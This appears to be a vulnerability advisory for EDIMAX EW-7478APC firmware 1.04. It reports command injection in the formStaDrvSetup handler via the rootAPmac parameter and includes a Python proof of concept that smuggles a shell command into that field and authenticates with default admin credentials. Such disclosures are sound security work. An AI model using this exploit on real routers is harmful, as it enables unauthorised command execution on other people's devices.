EDIMAX-EW-7478APC-formStaDrvSetup

Overview

The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/EW7478APC_1.04.zip

Affected version

EW-7478APC 1.04

Vulnerability details

The EDIMAX EW-7478APC 1.04 firmware has a command injection vulnerability in the formStaDrvSetup function. The v71 variables receive the rootAPmac parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.

POC

import requests

ip = "192.168.2.1"

data = {
    "stadrv_band":    "0",
    "stadrv_type":    "0",
    "wiz_wispManu":   "0",
    "WISP_enable5g":  "0",
    "WISPMANU":       "",
    "rootAPmac":      "'`ps>/1.txt`'",
    "submit-url":     "/",
    "isApply":        "",
    "stadrv_clonemac":    "",
    "stadrv_ssid":        "",
    "stadrv_chan":         "",
    "stadrv_encrypttype": "",
}
url = f'http://{ip}/goform/formStaDrvSetup'

res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)